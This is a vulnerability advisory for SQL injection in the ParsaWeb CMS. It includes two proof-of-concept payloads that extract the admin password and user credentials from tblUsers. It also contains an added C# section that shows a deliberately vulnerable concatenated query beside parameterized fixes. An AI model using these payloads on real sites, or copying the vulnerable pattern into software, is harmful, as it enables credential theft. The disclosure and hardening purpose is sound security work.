
ParsaWeb CMS SQL Injection






########################## www.BugReport.ir #######################################
#
#        AmnPardaz Security Research Team
#
# Title: ParsaWeb CMS SQL Injection
# Vendor: http://www.parsagostar.com
# Demo: http://cms.parsagostar.com/
# Exploit: Available
# Impact: High
# Fix: N/A
# Original advisory: http://www.bugreport.ir/index_53.htm
###################################################################################

####################
1. Description:
####################

        ParsaWeb is a commercial ASP.NET website and content management system.

####################
2. Vulnerabilities:
####################

        Input passed to the "id" parameter of default.aspx and to the txtSearch field in the
search section is not properly sanitised before being used in SQL queries.
        This can be exploited to manipulate those SQL queries by injecting arbitrary SQL code.


####################
3. Exploits/POCs:
####################

        http://www.example.com/?page=page&id=-164 or 1=(select top 1 user_pass from tblUsers where user_name = 'admin')

        http://www.example.com/?page=Search
        Search: AmnPardaz%') union ALL select '1',user_name+':'+user_pass,'3','4','5','6','7','8','9','10',11 from tblUsers--



####################
4. Solution:
####################

        Edit the source code to ensure that inputs are properly sanitised.
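The advisory's fix is generic, so the following is an added illustration of what "properly sanitised" means for the two injection points described above. It is not ParsaWeb's code and not from the advisory: the vulnerable string-concatenation pattern is a reconstruction of the kind of code that produces this class of bug, shown next to a parameterized replacement using ADO.NET's SqlCommand. The table and column names tblUsers, user_name and user_pass come from the advisory's PoC; the page table tblPages, its columns title and body, the method names and the connection string are assumed placeholders.

```csharp
// Added example, not ParsaWeb's code: the concatenation pattern behind the
// advisory's SQL injection, beside a parameterized version of the same queries.
using System;
using System.Data;
using System.Data.SqlClient;

public static class PageRepository
{
    // ASSUMED placeholder; a real application reads this from configuration.
    private const string ConnectionString =
        "Server=.;Database=ParsaWebDemo;Integrated Security=true";

    // BEFORE (vulnerable): the raw query-string value is spliced into the SQL
    // text, so a value such as "-164 or 1=(select top 1 user_pass from tblUsers ...)"
    // is executed as SQL rather than compared as a number.
    public static string BuildVulnerableQuery(string rawId)
    {
        return "SELECT title, body FROM tblPages WHERE id = " + rawId;
    }

    // AFTER (hardened): the value is validated as an integer and bound as a typed
    // parameter, so the database only ever sees a number, never attacker-supplied SQL.
    public static DataTable LoadPage(string rawId)
    {
        if (!int.TryParse(rawId, out int id) || id < 0)
            throw new ArgumentException("id must be a non-negative integer", nameof(rawId));

        using (var conn = new SqlConnection(ConnectionString))
        using (var cmd = new SqlCommand("SELECT title, body FROM tblPages WHERE id = @id", conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();
            var table = new DataTable();
            using (var reader = cmd.ExecuteReader())
            {
                table.Load(reader);
            }
            return table;
        }
    }

    // Search: the same rule applied to the txtSearch input. The LIKE wildcard is
    // placed in the parameter VALUE, not in the SQL text, so a term such as
    // "AmnPardaz%') union ALL select ..." is matched literally as page text.
    // Escaping %, _ and [ additionally stops a user-supplied wildcard from
    // matching every row (T-SQL treats [x] as a literal x inside LIKE).
    public static DataTable Search(string term)
    {
        if (term == null) term = string.Empty;
        string escaped = term
            .Replace("[", "[[]")   // must be escaped first, before adding more brackets
            .Replace("%", "[%]")
            .Replace("_", "[_]");

        using (var conn = new SqlConnection(ConnectionString))
        using (var cmd = new SqlCommand(
            "SELECT id, title FROM tblPages WHERE title LIKE @pattern OR body LIKE @pattern", conn))
        {
            cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 200).Value = "%" + escaped + "%";
            conn.Open();
            var table = new DataTable();
            using (var reader = cmd.ExecuteReader())
            {
                table.Load(reader);
            }
            return table;
        }
    }
}
```

The integer check on `id` and the parameterization are independent defences: the parameter alone already prevents injection, and the `int.TryParse` guard gives a clean error for the `id=-164 or ...` shape instead of a database exception. A database login used by the site that has no SELECT right on tblUsers would further limit what any remaining injection in other code paths could read.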

####################
5. Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir 
www.AmnPardaz.com 



